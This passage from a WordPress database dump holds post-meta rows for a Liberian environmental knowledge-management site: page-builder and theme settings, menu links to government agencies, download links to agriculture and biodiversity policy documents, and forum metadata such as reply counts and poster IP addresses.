\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(10207,1758,'_elementor_version','2.7.5'),(10208,1758,'_elementor_template_type','wp-post'),(10209,1758,'_elementor_controls_usage','a:5:{s:8:\"oew-logo\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:12:\"section_logo\";a:1:{s:15:\"position_mobile\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:5;s:19:\"_inline_size_tablet\";i:3;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:11:\"css_classes\";i:2;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:4;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:7:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:22:\"typography_font_family\";i:1;s:28:\"text_shadow_text_shadow_type\";i:1;s:23:\"text_shadow_text_shadow\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:6:\"layout\";a:3:{s:14:\"section_layout\";a:3:{s:16:\"content_position\";i:2;s:6:\"layout\";i:3;s:3:\"gap\";i:2;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:3:{s:7:\"padding\";i:2;s:14:\"padding_tablet\";i:1;s:11:\"css_classes\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}s:7:\"oew-nav\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:11:\"section_nav\";a:2:{s:19:\"navigation_position\";i:1;s:26:\"navigation_position_mobile\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_navigation\";a:3:{s:26:\"navigation_typo_typography\";i:1;s:32:\"navigation_typo_font_size_tablet\";i:1;s:32:\"navigation_typo_font_size_mobile\";i:1;}}}}}'),(10211,30,'ocean_second_sidebar','0'),(10212,30,'ocean_center_header_left_menu','0'),(10213,30,'ocean_custom_header_template','0'),(10214,30,'ocean_menu_typo_font_family','0'),(10215,30,'ocean_disable_heading','default'),(10216,30,'ocean_custom_footer_template','0'),(10217,30,'ofc_enable_fullscreen','disable'),(10218,30,'ofc_fullscreen_nav','enable'),(10219,30,'ofc_fullscreen_nav_pos','right'),(10220,30,'oh_enable_hook','disable'),(10221,30,'oh_hook_location','0'),(10222,30,'oh_hook_priority','0'),(10223,30,'oh_hook_php','disable'),(10224,30,'oh_hook_cond_logic',''),(10225,30,'oh_hook_user_roles',''),(10226,30,'osh_disable_topbar_sticky','default'),(10227,30,'osh_disable_header_sticky','default'),(10228,30,'osh_sticky_header_style','default'),(10229,30,'php_data','<?php\r\n	// Add your snippet here.\r\n?>'),(10253,1761,'_menu_item_type','custom'),(10254,1761,'_menu_item_menu_item_parent','0'),(10255,1761,'_menu_item_object_id','1761'),(10256,1761,'_menu_item_object','custom'),(10257,1761,'_menu_item_target','_blank'),(10258,1761,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(10259,1761,'_menu_item_xfn',''),(10260,1761,'_menu_item_url','http://www.epa.gov.lr/content/esia-process'),(10262,1761,'_menu_item_template',''),(10263,1761,'_menu_item_mega_template','0'),(10264,1761,'_menu_item_nolink',''),(10265,1761,'_menu_item_category_post',''),(10266,1761,'_menu_item_megamenu',''),(10267,1761,'_menu_item_megamenu_auto_width',''),(10268,1761,'_menu_item_megamenu_col',''),(10269,1761,'_menu_item_megamenu_heading',''),(10270,1761,'_menu_item_megamenu_widgetarea','0'),(10271,1761,'_menu_item_icon',''),(10272,1762,'_menu_item_type','custom'),(10273,1762,'_menu_item_menu_item_parent','0'),(10274,1762,'_menu_item_object_id','1762'),(10275,1762,'_menu_item_object','custom'),(10276,1762,'_menu_item_target','_blank'),(10277,1762,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(10278,1762,'_menu_item_xfn',''),(10279,1762,'_menu_item_url','http://www.epa.gov.lr/'),(10281,1762,'_menu_item_template',''),(10282,1762,'_menu_item_mega_template','0'),(10283,1762,'_menu_item_nolink',''),(10284,1762,'_menu_item_category_post',''),(10285,1762,'_menu_item_megamenu',''),(10286,1762,'_menu_item_megamenu_auto_width',''),(10287,1762,'_menu_item_megamenu_col',''),(10288,1762,'_menu_item_megamenu_heading',''),(10289,1762,'_menu_item_megamenu_widgetarea','0'),(10290,1762,'_menu_item_icon',''),(10291,1762,'_elementor_controls_usage','a:0:{}'),(10292,1761,'_elementor_controls_usage','a:0:{}'),(10294,1763,'_menu_item_type','custom'),(10295,1763,'_menu_item_menu_item_parent','0'),(10296,1763,'_menu_item_object_id','1763'),(10297,1763,'_menu_item_object','custom'),(10298,1763,'_menu_item_target','_blank'),(10299,1763,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(10300,1763,'_menu_item_xfn',''),(10301,1763,'_menu_item_url','http://fda.gov.lr/'),(10303,1763,'_menu_item_template',''),(10304,1763,'_menu_item_mega_template','0'),(10305,1763,'_menu_item_nolink',''),(10306,1763,'_menu_item_category_post',''),(10307,1763,'_menu_item_megamenu',''),(10308,1763,'_menu_item_megamenu_auto_width',''),(10309,1763,'_menu_item_megamenu_col',''),(10310,1763,'_menu_item_megamenu_heading',''),(10311,1763,'_menu_item_megamenu_widgetarea','0'),(10312,1763,'_menu_item_icon',''),(10313,1764,'_menu_item_type','custom'),(10314,1764,'_menu_item_menu_item_parent','0'),(10315,1764,'_menu_item_object_id','1764'),(10316,1764,'_menu_item_object','custom'),(10317,1764,'_menu_item_target','_blank'),(10318,1764,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(10319,1764,'_menu_item_xfn',''),(10320,1764,'_menu_item_url','http://www.fda.gov.lr/projects/'),(10322,1764,'_menu_item_template',''),(10323,1764,'_menu_item_mega_template','0'),(10324,1764,'_menu_item_nolink',''),(10325,1764,'_menu_item_category_post',''),(10326,1764,'_menu_item_megamenu',''),(10327,1764,'_menu_item_megamenu_auto_width',''),(10328,1764,'_menu_item_megamenu_col',''),(10329,1764,'_menu_item_megamenu_heading',''),(10330,1764,'_menu_item_megamenu_widgetarea','0'),(10331,1764,'_menu_item_icon',''),(10332,1763,'_elementor_controls_usage','a:0:{}'),(10333,1764,'_elementor_controls_usage','a:0:{}'),(10376,91,'ofc_enable_fullscreen','disable'),(10377,91,'ofc_fullscreen_nav','enable'),(10378,91,'ofc_fullscreen_nav_pos','right'),(10379,91,'osh_disable_topbar_sticky','default'),(10380,91,'osh_disable_header_sticky','default'),(10381,91,'osh_sticky_header_style','default'),(10382,91,'_elementor_edit_mode','builder'),(10383,91,'_elementor_template_type','wp-page'),(10384,91,'_elementor_version','3.4.1'),(10385,1766,'_elementor_controls_usage','a:0:{}'),(10386,1766,'by','MOA'),(10387,1766,'year','2010'),(10388,1766,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-National-Cassava-Development-Strategy_Final.doc'),(10389,1766,'_pods_cover_image','a:1:{i:0;i:573;}'),(10395,1766,'_dp_original','1751'),(10396,1766,'_edit_lock','1670323548:42'),(10397,1766,'_edit_last','42'),(10398,1767,'_wp_attached_file','2019/11/Liberia-National-Cassava-Development-Strategy_Final.doc'),(10399,1766,'_pods_file_type_image','a:1:{i:0;i:1694;}'),(10401,1766,'_pods_attached_document','a:1:{i:0;i:1767;}'),(10403,1768,'_elementor_controls_usage','a:0:{}'),(10404,1768,'by','MOA'),(10405,1768,'year','Various'),(10406,1768,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Chemical-Policy-Documents.zip'),(10407,1768,'_pods_cover_image','a:1:{i:0;i:573;}'),(10413,1768,'_dp_original','1766'),(10414,1768,'_edit_lock','1670323559:42'),(10415,1769,'_wp_attached_file','2019/11/Chemical-Policy-Documents.zip'),(10416,1768,'_edit_last','42'),(10417,1768,'_pods_file_type_image','a:1:{i:0;i:1691;}'),(10419,1768,'_pods_attached_document','a:1:{i:0;i:1769;}'),(10421,1770,'_elementor_controls_usage','a:0:{}'),(10422,1770,'by','MOA'),(10423,1770,'year','2008'),(10424,1770,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/National-Food-Security-and-Nutrition-Strategy_Mar08_1.pdf'),(10425,1770,'_pods_cover_image','a:1:{i:0;i:573;}'),(10431,1770,'_dp_original','1768'),(10432,1770,'_edit_lock','1670323552:42'),(10433,1770,'_edit_last','42'),(10434,1771,'_wp_attached_file','2019/11/National-Food-Security-and-Nutrition-Strategy_Mar08_1.pdf'),(10435,1770,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(10437,1770,'_pods_attached_document','a:1:{i:0;i:1771;}'),(10441,1772,'_elementor_controls_usage','a:0:{}'),(10442,1772,'by','MOA'),(10443,1772,'year','2007'),(10444,1772,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/CAAS-LIB.pdf'),(10445,1772,'_pods_cover_image','a:1:{i:0;i:573;}'),(10451,1772,'_dp_original','1768'),(10452,1772,'_edit_lock','1670323557:42'),(10453,1772,'_edit_last','42'),(10454,1773,'_wp_attached_file','2019/11/CAAS-LIB.pdf'),(10455,1772,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(10457,1772,'_pods_attached_document','a:1:{i:0;i:1773;}'),(10459,1774,'_elementor_controls_usage','a:0:{}'),(10460,1774,'by','MOA'),(10461,1774,'year','2012'),(10462,1774,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/NCDS_Final_2012.doc'),(10463,1774,'_pods_cover_image','a:1:{i:0;i:573;}'),(10469,1774,'_dp_original','1772'),(10470,1774,'_edit_lock','1670323433:42'),(10471,1774,'_edit_last','42'),(10472,1775,'_wp_attached_file','2019/11/NCDS_Final_2012.doc'),(10473,1774,'_pods_file_type_image','a:1:{i:0;i:1694;}'),(10475,1774,'_pods_attached_document','a:1:{i:0;i:1775;}'),(10477,1776,'_elementor_controls_usage','a:0:{}'),(10478,1776,'by','UNCBD'),(10479,1776,'year','1992'),(10480,1776,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/uncbd_convention_en.pdf'),(10481,1776,'_pods_cover_image','a:1:{i:0;i:573;}'),(10487,1776,'_dp_original','1774'),(10488,1776,'_edit_lock','1670323429:42'),(10489,1776,'_edit_last','42'),(10490,1777,'_wp_attached_file','2019/11/uncbd_convention_en.pdf'),(10491,1776,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(10493,1776,'_pods_attached_document','a:1:{i:0;i:1777;}'),(10495,1778,'_elementor_controls_usage','a:0:{}'),(10496,1778,'by','UNCCD'),(10497,1778,'year','1994'),(10498,1778,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/unccd_convention_en.pdf'),(10499,1778,'_pods_cover_image','a:1:{i:0;i:573;}'),(10501,1778,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(10505,1778,'_dp_original','1776'),(10506,1778,'_edit_lock','1670323426:42'),(10507,1778,'_edit_last','42'),(10508,1779,'_wp_attached_file','2019/11/unccd_convention_en.pdf'),(10510,1778,'_pods_attached_document','a:1:{i:0;i:1779;}'),(10514,1780,'_elementor_controls_usage','a:0:{}'),(10515,1780,'by','UNFCCC'),(10516,1780,'year','1994'),(10517,1780,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/unfccc_convention_text_with_annexes_en.pdf'),(10518,1780,'_pods_cover_image','a:1:{i:0;i:573;}'),(10519,1780,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(10524,1780,'_dp_original','1778'),(10525,1780,'_edit_lock','1670323423:42'),(10526,1780,'_edit_last','42'),(10527,1781,'_wp_attached_file','2019/11/unfccc_convention_text_with_annexes_en.pdf'),(10529,1780,'_pods_attached_document','a:1:{i:0;i:1781;}'),(10531,1782,'_elementor_controls_usage','a:0:{}'),(10532,1782,'by','UNFCCC'),(10533,1782,'year','2012'),(10534,1782,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/rio_20_adaptation_brochure.pdf'),(10535,1782,'_pods_cover_image','a:1:{i:0;i:573;}'),(10536,1782,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(10541,1782,'_dp_original','1780'),(10542,1782,'_edit_lock','1670324465:42'),(10543,1782,'_edit_last','42'),(10544,1783,'_wp_attached_file','2019/11/rio_20_adaptation_brochure.pdf'),(10546,1782,'_pods_attached_document','a:1:{i:0;i:1783;}'),(10552,1776,'_wp_old_slug','convention-text-cbd'),(10555,1784,'_elementor_controls_usage','a:0:{}'),(10556,1784,'_elementor_edit_mode','builder'),(10557,1784,'_elementor_template_type','wp-page'),(10558,1784,'_elementor_version','2.7.5'),(10560,1785,'_wp_attached_file','2019/11/posts-table-pro.zip'),(10561,1785,'_wp_attachment_context','upgrader'),(10564,1787,'_menu_item_type','post_type'),(10565,1787,'_menu_item_menu_item_parent','0'),(10566,1787,'_menu_item_object_id','68'),(10567,1787,'_menu_item_object','page'),(10568,1787,'_menu_item_target',''),(10569,1787,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(10570,1787,'_menu_item_xfn',''),(10571,1787,'_menu_item_url',''),(10573,1787,'_menu_item_template',''),(10574,1787,'_menu_item_mega_template','0'),(10575,1787,'_menu_item_nolink',''),(10576,1787,'_menu_item_category_post',''),(10577,1787,'_menu_item_megamenu',''),(10578,1787,'_menu_item_megamenu_auto_width',''),(10579,1787,'_menu_item_megamenu_col',''),(10580,1787,'_menu_item_megamenu_heading',''),(10581,1787,'_menu_item_megamenu_widgetarea','0'),(10582,1787,'_menu_item_icon',''),(10583,1788,'_menu_item_type','post_type'),(10584,1788,'_menu_item_menu_item_parent','0'),(10585,1788,'_menu_item_object_id','74'),(10586,1788,'_menu_item_object','page'),(10587,1788,'_menu_item_target',''),(10588,1788,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(10589,1788,'_menu_item_xfn',''),(10590,1788,'_menu_item_url',''),(10592,1788,'_menu_item_template',''),(10593,1788,'_menu_item_mega_template','0'),(10594,1788,'_menu_item_nolink',''),(10595,1788,'_menu_item_category_post',''),(10596,1788,'_menu_item_megamenu',''),(10597,1788,'_menu_item_megamenu_auto_width',''),(10598,1788,'_menu_item_megamenu_col',''),(10599,1788,'_menu_item_megamenu_heading',''),(10600,1788,'_menu_item_megamenu_widgetarea','0'),(10601,1788,'_menu_item_icon',''),(10621,1790,'_menu_item_type','post_type'),(10622,1790,'_menu_item_menu_item_parent','0'),(10623,1790,'_menu_item_object_id','72'),(10624,1790,'_menu_item_object','page'),(10625,1790,'_menu_item_target',''),(10626,1790,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(10627,1790,'_menu_item_xfn',''),(10628,1790,'_menu_item_url',''),(10630,1790,'_menu_item_template',''),(10631,1790,'_menu_item_mega_template','0'),(10632,1790,'_menu_item_nolink',''),(10633,1790,'_menu_item_category_post',''),(10634,1790,'_menu_item_megamenu',''),(10635,1790,'_menu_item_megamenu_auto_width',''),(10636,1790,'_menu_item_megamenu_col',''),(10637,1790,'_menu_item_megamenu_heading',''),(10638,1790,'_menu_item_megamenu_widgetarea','0'),(10639,1790,'_menu_item_icon',''),(10640,1787,'_elementor_controls_usage','a:0:{}'),(10641,1788,'_elementor_controls_usage','a:0:{}'),(10643,1790,'_elementor_controls_usage','a:0:{}'),(10702,413,'built_in_post_types_mea_resource','1'),(10703,465,'built_in_post_types_mea_resource','1'),(10704,1791,'_menu_item_type','custom'),(10705,1791,'_menu_item_menu_item_parent','0'),(10706,1791,'_menu_item_object_id','1791'),(10707,1791,'_menu_item_object','custom'),(10708,1791,'_menu_item_target','_blank'),(10709,1791,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(10710,1791,'_menu_item_xfn',''),(10711,1791,'_menu_item_url','http://www.epa.gov.lr/?q=content/meas-projects'),(10713,1791,'_menu_item_template',''),(10714,1791,'_menu_item_mega_template','0'),(10715,1791,'_menu_item_nolink',''),(10716,1791,'_menu_item_category_post',''),(10717,1791,'_menu_item_megamenu',''),(10718,1791,'_menu_item_megamenu_auto_width',''),(10719,1791,'_menu_item_megamenu_col',''),(10720,1791,'_menu_item_megamenu_heading',''),(10721,1791,'_menu_item_megamenu_widgetarea','0'),(10722,1791,'_menu_item_icon',''),(10723,1791,'_elementor_controls_usage','a:0:{}'),(10747,975,'_elementor_controls_usage','a:0:{}'),(10748,975,'_edit_last','1'),(10749,975,'_elementor_controls_usage','a:0:{}'),(10750,975,'_bbp_last_active_time','2019-10-30 11:58:32'),(10751,975,'_bbp_forum_subforum_count','0'),(10752,975,'_bbp_reply_count','0'),(10753,975,'_bbp_total_reply_count','0'),(10754,975,'_bbp_topic_count','1'),(10755,975,'_bbp_total_topic_count','1'),(10756,975,'_bbp_topic_count_hidden','0'),(10757,975,'_bbp_last_topic_id','0'),(10758,975,'_bbp_last_reply_id','0'),(10759,975,'_bbp_last_active_id','0'),(10760,1174,'_elementor_controls_usage','a:0:{}'),(10761,1174,'_edit_last','2'),(10762,1174,'_elementor_controls_usage','a:0:{}'),(10763,1174,'_bbp_last_active_time','2019-11-05 09:44:12'),(10764,1174,'_bbp_forum_subforum_count','0'),(10765,1174,'_bbp_reply_count','0'),(10766,1174,'_bbp_total_reply_count','0'),(10767,1174,'_bbp_topic_count','8'),(10768,1174,'_bbp_total_topic_count','8'),(10769,1174,'_bbp_topic_count_hidden','0'),(10770,1174,'_bbp_last_topic_id','1644'),(10771,1174,'_bbp_last_reply_id','1644'),(10772,1174,'_bbp_last_active_id','1644'),(10773,1176,'_elementor_controls_usage','a:0:{}'),(10774,1176,'_edit_last','2'),(10775,1176,'_elementor_controls_usage','a:0:{}'),(10776,1176,'_bbp_last_active_time','2019-11-05 09:58:39'),(10777,1176,'_bbp_forum_subforum_count','0'),(10778,1176,'_bbp_reply_count','0'),(10779,1176,'_bbp_total_reply_count','0'),(10780,1176,'_bbp_topic_count','4'),(10781,1176,'_bbp_total_topic_count','4'),(10782,1176,'_bbp_topic_count_hidden','0'),(10783,1176,'_bbp_last_topic_id','1651'),(10784,1176,'_bbp_last_reply_id','1651'),(10785,1176,'_bbp_last_active_id','1651'),(10786,1179,'_elementor_controls_usage','a:0:{}'),(10787,1179,'_edit_last','2'),(10788,1179,'_elementor_controls_usage','a:0:{}'),(10789,1179,'_bbp_last_active_time','2019-11-05 12:49:16'),(10790,1179,'_bbp_forum_subforum_count','0'),(10791,1179,'_bbp_reply_count','0'),(10792,1179,'_bbp_total_reply_count','0'),(10793,1179,'_bbp_topic_count','10'),(10794,1179,'_bbp_total_topic_count','10'),(10795,1179,'_bbp_topic_count_hidden','1'),(10796,1179,'_bbp_last_topic_id','1692'),(10797,1179,'_bbp_last_reply_id','1692'),(10798,1179,'_bbp_last_active_id','1692'),(10801,1186,'_elementor_controls_usage','a:0:{}'),(10802,1186,'_elementor_controls_usage','a:0:{}'),(10803,1186,'_bbp_forum_id','975'),(10804,1186,'_bbp_topic_id','1186'),(10805,1186,'_bbp_author_ip','41.57.95.57'),(10806,1186,'_bbp_last_reply_id','0'),(10807,1186,'_bbp_last_active_id','1186'),(10808,1186,'_bbp_last_active_time','2019-11-01 11:03:18'),(10809,1186,'_bbp_reply_count','0'),(10810,1186,'_bbp_reply_count_hidden','0'),(10811,1186,'_bbp_voice_count','1'),(10812,1356,'_elementor_controls_usage','a:0:{}'),(10813,1356,'_elementor_controls_usage','a:0:{}'),(10814,1356,'_bbp_forum_id','1174'),(10815,1356,'_bbp_topic_id','1356'),(10816,1356,'_bbp_author_ip','41.191.105.235'),(10817,1356,'_bbp_last_reply_id','0'),(10818,1356,'_bbp_last_active_id','1356'),(10819,1356,'_bbp_last_active_time','2019-11-04 01:26:29'),(10820,1356,'_bbp_reply_count','0'),(10821,1356,'_bbp_reply_count_hidden','0'),(10822,1356,'_bbp_voice_count','1'),(10823,1796,'_elementor_controls_usage','a:0:{}'),(10824,1796,'_elementor_controls_usage','a:0:{}'),(10825,1796,'_bbp_forum_id','1174'),(10826,1796,'_bbp_topic_id','1638'),(10827,1796,'_bbp_author_ip','41.191.105.232'),(10828,1796,'_bbp_last_reply_id','0'),(10829,1796,'_bbp_last_active_id','1638'),(10830,1796,'_bbp_last_active_time','2019-11-05 09:25:49'),(10831,1796,'_bbp_reply_count','0'),(10832,1796,'_bbp_reply_count_hidden','0'),(10833,1796,'_bbp_voice_count','1'),(10834,1797,'_elementor_controls_usage','a:0:{}'),(10835,1797,'_elementor_controls_usage','a:0:{}'),(10836,1797,'_bbp_forum_id','1174'),(10837,1797,'_bbp_topic_id','1639'),(10838,1797,'_bbp_author_ip','41.191.105.232'),(10839,1797,'_bbp_last_reply_id','0'),(10840,1797,'_bbp_last_active_id','1639'),(10841,1797,'_bbp_last_active_time','2019-11-05 09:32:58'),(10842,1797,'_bbp_reply_count','0'),(10843,1797,'_bbp_reply_count_hidden','0'),(10844,1797,'_bbp_voice_count','1'),(10845,1798,'_elementor_controls_usage','a:0:{}'),(10846,1798,'_elementor_controls_usage','a:0:{}'),(10847,1798,'_bbp_forum_id','1174'),(10848,1798,'_bbp_topic_id','1640'),(10849,1798,'_bbp_author_ip','41.191.105.232'),(10850,1798,'_bbp_last_reply_id','0'),(10851,1798,'_bbp_last_active_id','1640'),(10852,1798,'_bbp_last_active_time','2019-11-05 09:38:48'),(10853,1798,'_bbp_reply_count','0'),(10854,1798,'_bbp_reply_count_hidden','0'),(10855,1798,'_bbp_voice_count','1'),(10856,1799,'_elementor_controls_usage','a:0:{}'),(10857,1799,'_elementor_controls_usage','a:0:{}'),(10858,1799,'_bbp_forum_id','1174'),(10859,1799,'_bbp_topic_id','1641'),(10860,1799,'_bbp_author_ip','41.191.105.232'),(10861,1799,'_bbp_last_reply_id','0'),(10862,1799,'_bbp_last_active_id','1641'),(10863,1799,'_bbp_last_active_time','2019-11-05 09:38:49'),(10864,1799,'_bbp_reply_count','0'),(10865,1799,'_bbp_reply_count_hidden','0'),(10866,1799,'_bbp_voice_count','1'),(10867,1800,'_elementor_controls_usage','a:0:{}'),(10868,1800,'_elementor_controls_usage','a:0:{}'),(10869,1800,'_bbp_forum_id','1174'),(10870,1800,'_bbp_topic_id','1642'),(10871,1800,'_bbp_author_ip','41.191.105.232'),(10872,1800,'_bbp_last_reply_id','0'),(10873,1800,'_bbp_last_active_id','1642'),(10874,1800,'_bbp_last_active_time','2019-11-05 09:40:26'),(10875,1800,'_bbp_reply_count','0'),(10876,1800,'_bbp_reply_count_hidden','0'),(10877,1800,'_bbp_voice_count','1'),(10878,1801,'_elementor_controls_usage','a:0:{}'),(10879,1801,'_elementor_controls_usage','a:0:{}'),(10880,1801,'_bbp_forum_id','1174'),(10881,1801,'_bbp_topic_id','1643'),(10882,1801,'_bbp_author_ip','41.191.105.232'),(10883,1801,'_bbp_last_reply_id','0'),(10884,1801,'_bbp_last_active_id','1643'),(10885,1801,'_bbp_last_active_time','2019-11-05 09:42:03'),(10886,1801,'_bbp_reply_count','0'),(10887,1801,'_bbp_reply_count_hidden','0'),(10888,1801,'_bbp_voice_count','1'),(10889,1802,'_elementor_controls_usage','a:0:{}'),(10890,1802,'_elementor_controls_usage','a:0:{}'),(10891,1802,'_bbp_forum_id','1174'),(10892,1802,'_bbp_topic_id','1644'),(10893,1802,'_bbp_author_ip','41.191.105.232'),(10894,1802,'_bbp_last_reply_id','0'),(10895,1802,'_bbp_last_active_id','1644'),(10896,1802,'_bbp_last_active_time','2019-11-05 09:44:12'),(10897,1802,'_bbp_reply_count','0'),(10898,1802,'_bbp_reply_count_hidden','0'),(10899,1802,'_bbp_voice_count','1'),(10900,1803,'_elementor_controls_usage','a:0:{}'),(10901,1803,'_elementor_controls_usage','a:0:{}'),(10902,1803,'_bbp_forum_id','1176'),(10903,1803,'_bbp_topic_id','1645'),(10904,1803,'_bbp_author_ip','41.191.105.232'),(10905,1803,'_bbp_last_reply_id','0'),(10906,1803,'_bbp_last_active_id','1645'),(10907,1803,'_bbp_last_active_time','2019-11-05 09:48:30'),(10908,1803,'_bbp_reply_count','0'),(10909,1803,'_bbp_reply_count_hidden','0'),(10910,1803,'_bbp_voice_count','1'),(10911,1804,'_elementor_controls_usage','a:0:{}'),(10912,1804,'_elementor_controls_usage','a:0:{}'),(10913,1804,'_bbp_forum_id','1176'),(10914,1804,'_bbp_topic_id','1649'),(10915,1804,'_bbp_author_ip','41.191.105.232'),(10916,1804,'_bbp_last_reply_id','0'),(10917,1804,'_bbp_last_active_id','1649'),(10918,1804,'_bbp_last_active_time','2019-11-05 09:54:50'),(10919,1804,'_bbp_reply_count','0'),(10920,1804,'_bbp_reply_count_hidden','0'),(10921,1804,'_bbp_voice_count','1'),(10922,1805,'_elementor_controls_usage','a:0:{}'),(10923,1805,'_elementor_controls_usage','a:0:{}'),(10924,1805,'_bbp_forum_id','1176'),(10925,1805,'_bbp_topic_id','1650'),(10926,1805,'_bbp_author_ip','41.191.105.232'),(10927,1805,'_bbp_last_reply_id','0'),(10928,1805,'_bbp_last_active_id','1650'),(10929,1805,'_bbp_last_active_time','2019-11-05 09:56:49'),(10930,1805,'_bbp_reply_count','0'),(10931,1805,'_bbp_reply_count_hidden','0'),(10932,1805,'_bbp_voice_count','1'),(10933,1806,'_elementor_controls_usage','a:0:{}'),(10934,1806,'_elementor_controls_usage','a:0:{}'),(10935,1806,'_bbp_forum_id','1176'),(10936,1806,'_bbp_topic_id','1651'),(10937,1806,'_bbp_author_ip','41.191.105.232'),(10938,1806,'_bbp_last_reply_id','0'),(10939,1806,'_bbp_last_active_id','1651'),(10940,1806,'_bbp_last_active_time','2019-11-05 09:58:39'),(10941,1806,'_bbp_reply_count','0'),(10942,1806,'_bbp_reply_count_hidden','0'),(10943,1806,'_bbp_voice_count','1'),(10944,1807,'_elementor_controls_usage','a:0:{}'),(10945,1807,'_elementor_controls_usage','a:0:{}'),(10946,1807,'_bbp_forum_id','1179'),(10947,1807,'_bbp_topic_id','1652'),(10948,1807,'_bbp_author_ip','41.191.105.232'),(10949,1807,'_bbp_last_reply_id','0'),(10950,1807,'_bbp_last_active_id','1652'),(10951,1807,'_bbp_last_active_time','2019-11-05 10:04:15'),(10952,1807,'_bbp_reply_count','0'),(10953,1807,'_bbp_reply_count_hidden','0'),(10954,1807,'_bbp_voice_count','1'),(10955,1679,'_elementor_controls_usage','a:0:{}'),(10956,1679,'_elementor_controls_usage','a:0:{}'),(10957,1679,'_bbp_forum_id','1179'),(10958,1679,'_bbp_topic_id','1679'),(10959,1679,'_bbp_author_ip','41.191.105.225'),(10960,1679,'_bbp_last_reply_id','0'),(10961,1679,'_bbp_last_active_id','1679'),(10962,1679,'_bbp_last_active_time','2019-11-05 12:23:06'),(10963,1679,'_bbp_reply_count','0'),(10964,1679,'_bbp_reply_count_hidden','0'),(10965,1679,'_bbp_voice_count','1'),(10966,1681,'_elementor_controls_usage','a:0:{}'),(10967,1681,'_elementor_controls_usage','a:0:{}'),(10968,1681,'_bbp_forum_id','1179'),(10969,1681,'_bbp_topic_id','1681'),(10970,1681,'_bbp_author_ip','41.191.105.225'),(10971,1681,'_bbp_last_reply_id','0'),(10972,1681,'_bbp_last_active_id','1681'),(10973,1681,'_bbp_last_active_time','2019-11-05 12:23:53'),(10974,1681,'_bbp_reply_count','0'),(10975,1681,'_bbp_reply_count_hidden','0'),(10976,1681,'_bbp_voice_count','1'),(10977,1683,'_elementor_controls_usage','a:0:{}'),(10978,1683,'_elementor_controls_usage','a:0:{}'),(10979,1683,'_bbp_forum_id','1179'),(10980,1683,'_bbp_topic_id','1683'),(10981,1683,'_bbp_author_ip','41.191.105.225'),(10982,1683,'_bbp_last_reply_id','0'),(10983,1683,'_bbp_last_active_id','1683'),(10984,1683,'_bbp_last_active_time','2019-11-05 